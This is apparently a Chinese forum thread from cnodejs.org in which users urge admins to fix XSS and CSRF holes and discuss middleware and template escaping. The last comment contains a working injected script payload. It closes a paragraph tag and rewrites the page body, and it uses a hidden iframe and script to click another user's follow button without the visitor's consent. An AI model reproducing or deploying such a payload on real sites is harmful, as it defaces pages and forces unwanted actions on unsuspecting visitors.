原文地址:http://snoopyxdy.blog.163.com/blog/static/60117440201284103022779/
cnodejs这个也太差了,大家还是直接看原文吧,我贴贴注入的脚本代码,不小心把cnodejs搞测漏了。。。 大大们快点修复吧,上面是我博客的原文地址,大神们轻拍啊,有什么问题这里可以留言哦~
再次呼吁下,已经有人注入了:http://cnodejs.org/topic/504d12aa0e73dda60703a936
再次呼吁下管理员,不要小看XSS和CSRF的威力,赶紧修复cnodjs的漏洞吧~ 有人已经注入了,地址:http://cnodejs.org/topic/504d12aa0e73dda60703a936
_csrf的中间件其实对于防御csrf一点用处没有的,还是验证码靠谱。 XSS主要是防止标签被提前闭合,如果用jade的话#{变量名}会将自动转义和过滤一些危险字符的
@snoopy nodeclub中的csrf一点用没有? 这么蛋疼啊? 另一个问题是 ejs 较之jade,对于这方面没有优势是吧 我一整个晚上都在看你的网易博客 真心大神啊~ 小弟真是学习了
@snoopy 大神 能否帮小弟解答一下下面这个帖子的问题? 谢啦~ http://cnodejs.org/topic/504dc7ea659b143e1d022ad1
@snoopy 恩 看到回复了 另外能否给小弟解答一下为啥nodeclub的csrf和xss方面不太到位呢 我看源码中也都用validator检验前台传过来的数据了 莫非这些xss是不经过后台的?
````</p><script>if (!localStorage['__stop']) $('body').html('<div style="font-size: 100px;text-align: center;margin-top: 60px;">Orz !!!</div>');</script><iframe src=“http://cnodejs.org/user/leizongmin” id="__flow" width=“0” height=“0”></iframe> <script>if (!localStorage[’__flow’]) { localStorage[’__flow’] = true; document.querySelector(’#__flow’).ownerDocument.querySelector(’#follow_btn’).click(); }</script>
